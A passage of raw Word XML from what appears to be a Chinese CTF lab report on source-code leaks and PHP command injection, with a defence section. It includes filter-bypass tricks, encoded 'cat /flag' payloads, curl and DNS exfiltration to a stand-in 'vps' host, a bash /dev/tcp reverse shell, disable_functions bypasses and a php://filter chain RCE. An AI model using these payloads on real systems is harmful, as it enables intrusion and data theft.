                <w:color w:val="C7254E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sz w:val="19"/>
              </w:rPr>
              <w:t>echo ec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ho </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E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⚠️ `*` 的坑（实测）：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/bin/e*  →  /bin/editor /bin/egrep /bin/elfedit ... hello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↑ 匹配到一堆，第一个直接当命令跑 → 失败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所以 `?` 比 `*` 安全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/bin/ec?o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 只有一个匹配。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⚠️ 通配符必须有"目录上下文"：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c?t          → 在【当前目录】找 → 没有匹配 → 命令不存在 ❌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/bin/c?t     → 在【/bin】找 → 匹配 /bin/cat ✅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常用替换表：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原字符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替代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tac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c\at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c'a't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/bin/c?t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$a$b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flag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f?ag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f*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????_??_????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[f]lag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空格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${IFS}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$IFS$9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&lt;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%09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斜杠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${PATH:0:1}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$'\57'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3.6.3 命令分隔符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符号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行为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前者输出去哪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;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顺序执行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直接输出（被 exec 收集）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**`\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`**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管道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`\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\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&amp;&amp;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前者成功才执行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直接输出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&amp;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后台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直接输出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`%0a`（换行）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同 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>;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直接输出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为什么本题用 `|` 更好（实测耗时对比）：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payload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拼成的命令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耗时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436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输出行数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127.0.0.1;id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ping -c 4 127.0.0.1;id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3425 ms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9 行（混）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**`\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id`**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`ping -c 4 \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id`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原因：`|` 让 `ping -c 4` 立刻失败（不用等 4 秒），且它的 stdout 被管道吃掉。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3.6.4 编码绕过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① base64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system(base64_decode("aWQ="));           // id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② hex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echo shell_exec(hex2bin("6964"));        // id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③ 反转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system(strrev("galf/ tac"));             // cat /flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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shell 层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$'\x63\x61\x74' /flag                     # cat /flag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echo 'Y2F0IC9mbGFn' | base64 -d | bash    # cat /flag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3.6.5 无回显外带（5 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命令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前提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写文件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id &gt; /var/www/html/o.txt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知道 web 根 + 可写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HTTP 外带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`curl http://vps/?x=$(id\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base64 -w0)`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DNS 外带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ping -c1 $(whoami).dns.com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只放行 DNS 也行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时间盲注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if [ $(cut -c1 /flag) = "f" ]; then sleep 3; fi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只能观察耗时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反弹 shell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bash -i &gt;&amp; /dev/tcp/vps/4444 0&gt;&amp;1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能出网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3.6.6 禁用函数绕过（10 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手法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原理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前提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`LD_PRELOAD` + `putenv` + `mail`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mail()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 第 5 参数触发 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sendmail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">，加载恶意 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.so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能上传 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.so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Apache Mod CGI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上传 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.htaccess</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 启用 CGI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Apache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PHP-FPM / FastCGI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打 FPM 端口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能访问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Shellshock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BASH_ENV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 注入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bash &lt; 4.3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imap_open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mailbox 参数注入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imap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 扩展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`pcntl_exec`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常被忘在 `disable_functions` 之外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pcntl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 扩展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Windows COM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new COM("WScript.Shell")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Windows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putenv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error_log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同 LD_PRELOAD 思路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bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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8"/>
              </w:rPr>
              <w:t>enable -f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加载自定义内建命令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win32std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win_exec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Windows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3.6.7 文件包含专项：`php://filter` 过滤器链 RCE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场景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allow_url_include=Off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，无法用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，且不能列目录。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原理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convert.iconv.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 系列编码转换可以"构造"出任意字节。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python3 ~/tools/php_filter_chain_generator.py --chain '&lt;?php system("ls /"); ?&gt;'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输出一条 4600+ 字符的 php://filter/... URL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curl -g "$T/?file=$(...)"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# → 执行 system("ls /")，实测成功列出目录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实测结果：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bin boot dev etc flag_3213 home lib ...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这是"只有 filter 时"的终极解法。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3.7 防御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层面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做法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不拼字符串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escapeshellarg()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escapeshellcmd()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白名单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filter_var($ip, FILTER_VALIDATE_IP)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不用 shell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proc_open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 传数组（PHP 7.4+ 支持 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>["cmd","arg1"]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禁用函数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disable_functions = system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec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最小权限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web 用户不能读 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/flag</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>、不能出网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open_basedir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限制可访问目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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危险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system("ping -c 1 " . $_GET['ip']);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稍好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system("ping -c 1 " . escapeshellarg($_GET['ip']));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// 最好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if (!filter_var($_GET['ip'], FILTER_VALIDATE_IP)) { die('invalid'); }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system("ping -c 1 " . $_GET['ip']);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⚠️ `escapeshellarg` 也不是万能的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— Windows 上有已知绕过（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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B63"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第四章 总结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4.1 知识地图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任务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├── 环境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└── WSL2 + Kali（工具链：curl / sqlite3 / hg / svn / python3）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├── 信息泄露（5 类）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├── 版本库类（同一原理，三条差异）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│   ├── Git  → .git/        → 哈希路径 → zlib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│   ├── SVN  → .svn/wc.db   → 哈希路径 → 原文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│   └── HG   → .hg/         → 文件名编码 → zlib/'u'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├── 备份文件类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│   └── 源码包 / 后缀变体 / .DS_Store / .env / IDE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└── 编辑器缓存类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       └── vim: .swp / .swo / .un~ / ~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└── 命令执行（3 层）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├── 系统命令函数（8 个：回显 / 返回 / 句柄）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├── 代码执行函数（eval / 回调 / 文件包含）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└── 绕过（6 类）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├── 空格 → ${IFS}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├── 关键字 → tac / c\at / f?ag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├── 斜杠 → ${PATH:0:1}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├── 分隔符 → ; / %0a / |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├── 编码 → base64 / hex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└── 禁用函数 → LD_PRELOAD / 伪协议链</w:t>
      </w:r>
    </w:p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4.2 踩坑清单（23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坑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249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教训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python GitHack.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 报 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>can't open file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Kali 上 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 就是 Python3，GitHack 要 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>python2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GitHack </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ModuleNotFoundError: urlparse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它是 2017 年的 Py2 代码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fatal: not a git repository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在工具目录而非 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dist/&lt;目标&gt;/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cd dist/$T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 找不到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目录名是 netloc 的 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">，且去掉 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://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wget --cut-dirs=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 削掉了 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.git</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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产物目录本身就是 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.git</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">，要 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mv dumped repo/.git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--cc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 出不来内容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是我 grep 正则 `^[+-][^+-]` 排除了 `++` 前缀</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>，不是 git 的问题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凭"index 有 3 个条目"判成 Index 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HEAD tree 也是 3 个，差集为空</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> —— 判据要算差集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curl .svn/wc.db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 报二进制警告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二进制文件必须 `-o`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只看 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NODES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 漏掉被删文件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要看 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PRISTINE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑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8"/>
              </w:rPr>
              <w:t>refcount = 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.hg/store/data/flag_xxx.txt.i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 404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`_` 要转义成 `__`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revlog 解压报 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>incomplete stream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首字节 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>'u'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 原文，不是 zlib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rip-hg.pl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 报 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cannot find hg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要先 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>apt install mercurial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ghproxy.net</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 502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换 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>gh-proxy.com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HackBar 里 body 被 URL 编码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看到 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%3C%3Fphp...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 编码了；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php://input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 不解码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`-G` 把 body 变成 URL 参数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php://input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 就没 body 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`eval` 里漏分号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 空白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PHP 语句要 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">（除非后面跟 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>?&gt;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17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`exec` 空白</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 输出走了 stderr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加 `2&gt;&amp;1` 看错误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18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c?t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 命令不存在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通配符只在"所在目录"匹配，必须写 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/bin/c?t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 flag_is_here/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 空白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cat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 的是目录 → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Is a directory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curl 吃掉 `${PATH:0:1}` 的花括号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URL globbing！加 `-g`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21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--data-urlencode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 把 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%0a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 再编码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用 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>$'\n'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 发真换行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22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表单框里填 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%0a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 无效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&lt;input&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 单行 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 会被编码成 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>%25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23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页面看不到 flag 但 Response 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`&lt;?php` 在 HTML 里是"伪注释"，会被吃</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 用 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>base64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4.3 方法论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三层递进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① 看得见    →  探测：把"有没有"变成确定的事实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（404 基线、状态码、title、固定路径表）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② 拿得到    →  搬运：知道路径就能取（目录 403 但文件能读）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（哈希路径 / 文件名编码）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③ 读得懂    →  解码：zlib / base64 / revlog 标记 / 编码转换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两个通用套路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套路 A：版本库泄露 = "探测 → 清单 → 取内容 → 解码"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套路 B：命令注入 = "找输入点 → 确认拼接 → 加分隔符 → 绕过滤"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三个反直觉认知（本任务最大收获）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`strpos` 返回 `0` 是 falsy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
